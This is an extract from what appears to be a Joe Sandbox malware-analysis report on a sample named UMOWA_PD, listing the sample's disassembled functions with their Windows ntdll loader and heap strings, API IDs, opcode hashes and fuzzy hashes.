                                                                                    • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-122214566
                                                                                    • Opcode ID: d5c5f490217524b0e8e1d9143050112a59c7fea82d6c59bf695adc66f79d5f55
                                                                                    • Instruction ID: 706d919272c55fb4f2f9539fcbe371542bf8efeb45f9dacfc83cfda39d242902
                                                                                    • Opcode Fuzzy Hash: d5c5f490217524b0e8e1d9143050112a59c7fea82d6c59bf695adc66f79d5f55
                                                                                    • Instruction Fuzzy Hash: FBC14575E10717ABEB048B6CC890BBEB7B4AF45304F58816AE842EF291DB75EC54C390
                                                                                    Function 33CC2594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 33D01F8A
                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 33D01F6A, 33D01FA4, 33D01FC4
                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 33D01FA9
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 33D01F82
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 33D01F6F
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 33D01FC9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                    • API String ID: 0-861424205
                                                                                    • Opcode ID: 5c87289baa2fd20e5ffb8292be49dd4ca2207139a46a2b562e45c4e28318891e
                                                                                    • Instruction ID: 44049a83e938b0184bc28eb11169f89604c8d38640cbe8bdf2119bfd017dc493
                                                                                    • Opcode Fuzzy Hash: 5c87289baa2fd20e5ffb8292be49dd4ca2207139a46a2b562e45c4e28318891e
                                                                                    • Instruction Fuzzy Hash: 4831C4BBE013587FEB109A96DC40F6B7B68DF40B94F0540A9BD10F7262D670AA01CAA1
                                                                                    Function 33CA0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-4253913091
                                                                                    • Opcode ID: a49c59a8492d6d49e35ae1f2b1e4d87f61e70e8a1ed4c4fa7c57a77a2b2eb715
                                                                                    • Instruction ID: a9b0ce7843e2413308b40f3a74fc1c5acc50777bc4a0e5a7db9cf17ad06547e5
                                                                                    • Opcode Fuzzy Hash: a49c59a8492d6d49e35ae1f2b1e4d87f61e70e8a1ed4c4fa7c57a77a2b2eb715
                                                                                    • Instruction Fuzzy Hash: A6F1BB75A00706DFEB05CF68C884BAAB7B5FF44384F1481A8E546DB781DB39E981CB90
                                                                                    Function 33CB9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                    • API String ID: 3446177414-2283098728
                                                                                    • Opcode ID: 12fd6d074905b3acd0295a5de500f2f8c2a58e5259330d30eb2be846913dde4f
                                                                                    • Instruction ID: 9d77598bb7ca041558e942b522b7f3aa097f8c1c51fbf241c8039eac0effcd9d
                                                                                    • Opcode Fuzzy Hash: 12fd6d074905b3acd0295a5de500f2f8c2a58e5259330d30eb2be846913dde4f
                                                                                    • Instruction Fuzzy Hash: 85510276A01B029FEB10DF38C884B19B7F5BF84310F19066DE595DFA91EB71A805CB92
                                                                                    Function 33CCC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 33D080F3
                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 33D080E9
                                                                                    • Failed to reallocate the system dirs string !, xrefs: 33D080E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-1783798831
                                                                                    • Opcode ID: 3c07a75597703d1fb17805d76dbaae56862f8b1a1c21db824c10a5358886f75d
                                                                                    • Instruction ID: 02a57d57cf1af653a29ab71f4066873b6870cb7657258425a6df903c432405de
                                                                                    • Opcode Fuzzy Hash: 3c07a75597703d1fb17805d76dbaae56862f8b1a1c21db824c10a5358886f75d
                                                                                    • Instruction Fuzzy Hash: 2A4117B6910354AFD710EF64DD40B4B77E8EF44B50F05482AF999EB651DB70E802CB92
                                                                                    Function 33D143D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • LdrpCheckRedirection, xrefs: 33D1450F
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 33D14508
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 33D14519
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 3446177414-3154609507
                                                                                    • Opcode ID: 0d658c5e3e1c125c1e9ace194b6de125cc82cc5ef308f20852ae3847a5a7a706
                                                                                    • Instruction ID: 9107af233e0e0324a2fbd292c5c143bfe762277eb1c3f1d6b280fc7ab91eeec7
                                                                                    • Opcode Fuzzy Hash: 0d658c5e3e1c125c1e9ace194b6de125cc82cc5ef308f20852ae3847a5a7a706
                                                                                    • Instruction Fuzzy Hash: 4E41D376E047119FDB90CF78E940A1677F8AF48A60F090669EC98DB251DB70E8A09B91
                                                                                    Function 33CB510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Kernel-MUI-Language-SKU, xrefs: 33CB534B
                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 33CB519B
                                                                                    • WindowsExcludedProcs, xrefs: 33CB514A
                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 33CB5167
                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 33CB5272
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                    • API String ID: 0-258546922
                                                                                    • Opcode ID: a6e6e537dcd8d52bebb31c06d4202665347c39be0602af0d3b88e86a1ae2f678
                                                                                    • Instruction ID: 7a751d52295bbdc2d1568b6a904c2d1940f9f94c8c7f508d1727e288b87f0d18
                                                                                    • Opcode Fuzzy Hash: a6e6e537dcd8d52bebb31c06d4202665347c39be0602af0d3b88e86a1ae2f678
                                                                                    • Instruction Fuzzy Hash: 10F14AB6D01619EFDF01CF99C980ADEBBB8FF08650F15406AE501EB611EB719E01CBA0
                                                                                    Function 33C87662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                    • API String ID: 0-3061284088
                                                                                    • Opcode ID: ea48ed8ab585368749fa383d40bb4c1ed9e6183e792dc6fa33499594c70ef6e0
                                                                                    • Instruction ID: 227163b3d63e09b9f0906028d7bb1ac77385ff2f576523cf80b6b81d3cb743b1
                                                                                    • Opcode Fuzzy Hash: ea48ed8ab585368749fa383d40bb4c1ed9e6183e792dc6fa33499594c70ef6e0
                                                                                    • Instruction Fuzzy Hash: 05014C3A416A409EE305A768D448F427BB4EB41739F2D44C9F054CF9A28A99AA41D560
                                                                                    Function 33C90485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • kLsE, xrefs: 33C905FE
                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33C90586
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                    • API String ID: 3446177414-2547482624
                                                                                    • Opcode ID: 99ca16df4a13717e7cdb649d89531d5d3f9442d62edf4111ab982f288c8d02b4
                                                                                    • Instruction ID: 91598995c67bbbfbb1b3845906c3bf9c810e538071ba99692c29c33bd0b88c29
                                                                                    • Opcode Fuzzy Hash: 99ca16df4a13717e7cdb649d89531d5d3f9442d62edf4111ab982f288c8d02b4
                                                                                    • Instruction Fuzzy Hash: CD51DEB5A00756DFFB10EFA5C4406EAB7F8AF04340F06843ED595CB641EB38A505CB65
                                                                                    Function 33C9A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                    • API String ID: 0-379654539
                                                                                    • Opcode ID: 7bc41b0d04a6e348873fbbf6811277005fc90fd969c06b4a21f6a254227e005f
                                                                                    • Instruction ID: 0cb9dc2d39d4da1ebe47abe4809b84fb02f2033cfe2e6e5a7d434984a77134ab
                                                                                    • Opcode Fuzzy Hash: 7bc41b0d04a6e348873fbbf6811277005fc90fd969c06b4a21f6a254227e005f
                                                                                    • Instruction Fuzzy Hash: 9CC18878608782CFE711CF19C440B9AB7E4FF88744F06896AF895CB650EB35C94ACB56
                                                                                    Function 33CC265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 33D01FE3, 33D020BB
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 33D020C0
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 33D01FE8
                                                                                    • .Local, xrefs: 33CC27F8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                    • API String ID: 0-1239276146
                                                                                    • Opcode ID: 4984f9a62e3fef20c6a156953ae02eed30f2d4e194e1ec01eb66b637ac080ec8
                                                                                    • Instruction ID: 8f6b00a1d2a51dce3812c6ab60891d06fc083e3f54048e2af5f89f3bfc25ca53
                                                                                    • Opcode Fuzzy Hash: 4984f9a62e3fef20c6a156953ae02eed30f2d4e194e1ec01eb66b637ac080ec8
                                                                                    • Instruction Fuzzy Hash: 9CA1AC76D0136A9BDB20CF64D884B99B3B5BF58754F1501EAD848EB261DB309E82CF90
                                                                                    Function 33C963CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 33CF0E72
                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 33CF0EB5
                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 33CF0DEC
                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 33CF0E2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                    • API String ID: 0-1468400865
                                                                                    • Opcode ID: 886eb83c02093211f8cc33fc0916ef384ec9b0195a5199920b6e57c4f5f54709
                                                                                    • Instruction ID: ab159697a77e9ac9e9e80ec3d454f30670b39a0ae4f7179118dc545748aaee23
                                                                                    • Opcode Fuzzy Hash: 886eb83c02093211f8cc33fc0916ef384ec9b0195a5199920b6e57c4f5f54709
                                                                                    • Instruction Fuzzy Hash: AF71CEB1904704DFE790DF54C884B8B7BA8EF847A4F450868F988CB696D734E598CBD1
                                                                                    Function 33C8F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                    • API String ID: 0-2586055223
                                                                                    • Opcode ID: 562d18edd6dc46842d9aca6f48fe287103c5f417ffe9b7888adbcd0829308847
                                                                                    • Instruction ID: 5832ee302b85019801db18c9f5df5ed24e809af59c2d6c3b491609ea37244d85
                                                                                    • Opcode Fuzzy Hash: 562d18edd6dc46842d9aca6f48fe287103c5f417ffe9b7888adbcd0829308847
                                                                                    • Instruction Fuzzy Hash: A861D075604781AFE312CF64D844F57B7E8EF84798F090659F9A4CF6A1CA34E940CB62
                                                                                    Function 33C890F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                    • API String ID: 0-1391187441
                                                                                    • Opcode ID: c9bc4bd76b27c8308cfa01eb7d3e35286a086def5bf19e18dff3f54cbbcd023f
                                                                                    • Instruction ID: 587b24290aa387a46bf730c7605c4a156c40b6a7be8e709e89abee0d6d982a72
                                                                                    • Opcode Fuzzy Hash: c9bc4bd76b27c8308cfa01eb7d3e35286a086def5bf19e18dff3f54cbbcd023f
                                                                                    • Instruction Fuzzy Hash: 59312336905204EFDB11DB94CC84FAAB7B8FF45764F1540A1F825EF292DB75EA40CA60
                                                                                    Function 33C97072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 2de0c247a25eb0d3ed7d7e45272fd04776aa28a7c0acc2d35d6c355eef9b7911
                                                                                    • Instruction ID: cdd01bfa0f32cb62656170bdb43c6effd681242d614273c7733d48ceb33d2af5
                                                                                    • Opcode Fuzzy Hash: 2de0c247a25eb0d3ed7d7e45272fd04776aa28a7c0acc2d35d6c355eef9b7911
                                                                                    • Instruction Fuzzy Hash: 0251EB34A01B05EFEB05EF69C844BAEB7B8BF44365F16412AE402DB690DB70E911CB80
                                                                                    Function 33D23608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                    • API String ID: 0-1168191160
                                                                                    • Opcode ID: 93b596dfc33a11a5be7685f56d7b42fa13e6101ad174d5b164447426d6ea14e3
                                                                                    • Instruction ID: db9650abd3c28a1c336fc6fd364a462de4da23903edaaa564ccc2ba8685f3721
                                                                                    • Opcode Fuzzy Hash: 93b596dfc33a11a5be7685f56d7b42fa13e6101ad174d5b164447426d6ea14e3
                                                                                    • Instruction Fuzzy Hash: 61F180B5A007288FDB21CF18CC90B99BBB5EF44748F4540E9EA49E7A40EB319E85CF55
                                                                                    Function 33C91380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • HEAP: , xrefs: 33C914B6
                                                                                    • HEAP[%wZ]: , xrefs: 33C91632
                                                                                    • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33C91648
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                    • API String ID: 0-3178619729
                                                                                    • Opcode ID: e9d3e76d2839cb7945a57df636bece91ee5e10317de604b0d0eaa6b31bfddd48
                                                                                    • Instruction ID: ab42c87a0261fa3980ced4f44fe2bf30261b6631c16f6b05193eaabc118b34a2
                                                                                    • Opcode Fuzzy Hash: e9d3e76d2839cb7945a57df636bece91ee5e10317de604b0d0eaa6b31bfddd48
                                                                                    • Instruction Fuzzy Hash: DAE10E74A047459FEB15CF29C4826BABBF5EF48340F1A895DE4D6CB245E734E940CB50
                                                                                    Function 33CBF4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 33D000C7
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 33D000F1
                                                                                    • RTL: Re-Waiting, xrefs: 33D00128
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    • Opcode ID: 04d407eece4ed2c6f6df9ea5c3ac3e3871426ea7c7ef78bb04a5babcde59217c
                                                                                    • Instruction ID: f40ddb00b083295d19cb77605b3b4f1fe160b4359807901315083190c445a807
                                                                                    • Opcode Fuzzy Hash: 04d407eece4ed2c6f6df9ea5c3ac3e3871426ea7c7ef78bb04a5babcde59217c
                                                                                    • Instruction Fuzzy Hash: 75E1A875A08741AFEB11CF68C880B0AB7F4AF84764F140A69F5A4CB7A1DB75E944CB42
                                                                                    Function 33C9B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                    • API String ID: 0-1145731471
                                                                                    • Opcode ID: f403a267dfda55604198b7e82467f008c8e4aeca2ea03a88c1494f11fb9e9da6
                                                                                    • Instruction ID: b2f17256a3c74ef606427c87dc08b9505e5ea94741bc789c2c6550be87ab951c
                                                                                    • Opcode Fuzzy Hash: f403a267dfda55604198b7e82467f008c8e4aeca2ea03a88c1494f11fb9e9da6
                                                                                    • Instruction Fuzzy Hash: 46B1BB75A40705ABEB58CFA9C990B9DB7B6FF84784F294529E851EB780D731E840CF20
                                                                                    Function 33C8A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
